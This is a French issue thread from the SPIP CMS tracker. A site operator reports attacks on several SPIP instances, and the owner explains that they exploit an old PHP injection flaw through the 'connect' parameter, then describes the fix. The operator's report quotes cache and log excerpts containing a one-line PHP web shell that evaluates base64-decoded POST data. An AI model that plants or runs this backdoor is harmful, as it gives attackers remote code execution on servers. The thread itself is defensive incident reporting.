Faille de sécurité permettant l'éxecution code arbitraire ? #3186

Closed
opened 9 years ago by miros · 1 comments
miros commented 9 years ago

Bonjour,

Notre serveur internet heberge plusieurs instances de SPIP (2.0.17, 3.0.5, 3.0.10, 3.0.15) qui ont toutes fait l'objet d'attaques le meme jour.
Les logs Apache nous incitent à penser que le code php présent dans les template permet d'exécuter du code PHP arbitraire sur le serveur:

./tmp/cache/skel/html_php_eval_base64_decode___POST_evv_____php___8cb61055a580123c6bf5e557ee95c074.php: $connect = '<php eval(base64_decode($_POST[evv]));<php #';

./tmp/cache/skel/html__php_eval_base64_decode___POST_evv______php___e1e5712fd8f023a9ac2d96c0f1b09c92.php: $connect = '<?php eval(base64_decode($_POST[evv]));<?php #';

./cache/skel/html____php_eval_base64_decode___POST_evv________php___dc3dae177a4dedb727d6a881885c7da0.php:// Fonction principale du squelette squelettes-dist/inc-entete.html pour ?><?php #

./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___913c7f052c4bcf1138cfbfea45867b88.php:// Fonction principale du squelette plugins/menu_accordeon/inc-menu-accordeon.html pour ?><?php #.

./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___2b0322f6212ab02fb205cd41fb952c47.php:// Fonction principale du squelette squelettes/inc-pied.html pour ?><?php #

Nous avons vidé les cache, mais nous craignons une recidive.

Bonjour, Notre serveur internet heberge plusieurs instances de SPIP (2.0.17, 3.0.5, 3.0.10, 3.0.15) qui ont toutes fait l'objet d'attaques le meme jour. Les logs Apache nous incitent à penser que le code php présent dans les template permet d'exécuter du code PHP arbitraire sur le serveur: ./tmp/cache/skel/html_php_eval_base64_decode___POST_evv_____php___8cb61055a580123c6bf5e557ee95c074.php: $connect = '<php eval(base64_decode($_POST[evv]));<php #'; ./tmp/cache/skel/html__php_eval_base64_decode___POST_evv______php___e1e5712fd8f023a9ac2d96c0f1b09c92.php: $connect = '<?php eval(base64_decode($_POST[evv]));<?php #'; ./cache/skel/html____php_eval_base64_decode___POST_evv________php___dc3dae177a4dedb727d6a881885c7da0.php:// Fonction principale du squelette squelettes-dist/inc-entete.html pour ?><?php eval(base64_decode($_POST[evv]));?><?php # ./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___913c7f052c4bcf1138cfbfea45867b88.php:// Fonction principale du squelette plugins/menu_accordeon/inc-menu-accordeon.html pour ?><?php eval(base64_decode($_POST[evv]));?><?php #. ./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___2b0322f6212ab02fb205cd41fb952c47.php:// Fonction principale du squelette squelettes/inc-pied.html pour ?><?php eval(base64_decode($_POST[evv]));?><?php # Nous avons vidé les cache, mais nous craignons une recidive.
Owner

Après analyse, pas de risque ici : c'est une tentative d'exploitation d'une ancienne faille qui permettait de faire de l'injection de PHP par ?connect= ou variantes.
En version 2.x le seul petit problème est qu'on log le contenu de connect directement dans spip.log, ce qui peut ouvrir la porte à une execution distante si le fichier log peut etre par la suite inclus (mais il faudrait pour cela exploiter une seconde faille d'inclusion arbitraire).

Nous déployons une version 2.x qui echappe les < dans les logs pour eviter tout risque de ce type, et nous renforçons l'écran de sécurité pour bloquer ces requetes qui de toute façon ne font que générer des fichiers cache foireux. Nous vous conseillons de déployer la version 1.1.9 de l'écran ( http://www.spip.net/fr_article4200.html )
Statut changé à Fermé

Après analyse, pas de risque ici : c'est une tentative d'exploitation d'une ancienne faille qui permettait de faire de l'injection de PHP par ?connect=<?php...?> ou variantes. En version 2.x le seul petit problème est qu'on log le contenu de connect directement dans spip.log, ce qui peut ouvrir la porte à une execution distante si le fichier log peut etre par la suite inclus (mais il faudrait pour cela exploiter une seconde faille d'inclusion arbitraire). Nous déployons une version 2.x qui echappe les `<` dans les logs pour eviter tout risque de ce type, et nous renforçons l'écran de sécurité pour bloquer ces requetes qui de toute façon ne font que générer des fichiers cache foireux. Nous vous conseillons de déployer la version 1.1.9 de l'écran ( http://www.spip.net/fr_article4200.html ) **Statut changé à Fermé**
Sign in to join this conversation.
No Milestone
No project
No Assignees
2 Participants
Notifications
Due Date

No due date set.

Dependencies

This issue currently doesn't have any dependencies.

Loading…
There is no content yet.